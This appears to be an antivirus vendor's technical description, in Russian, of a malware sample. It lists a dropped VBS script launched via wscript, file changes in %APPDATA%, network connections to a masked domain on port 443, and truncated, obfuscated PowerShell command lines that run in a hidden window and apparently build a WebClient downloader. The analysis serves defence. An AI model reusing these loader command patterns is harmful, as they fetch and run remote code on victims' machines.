Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\rFECN.vbs"
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\rfecn.vbs
Удаляет следующие файлы
- %APPDATA%\rfecn.vbs
Сетевая активность
Подключается к
- 'me###anong.com':443
TCP
Другие
- 'me###anong.com':443
UDP
- DNS ASK me###anong.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'e...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'e...
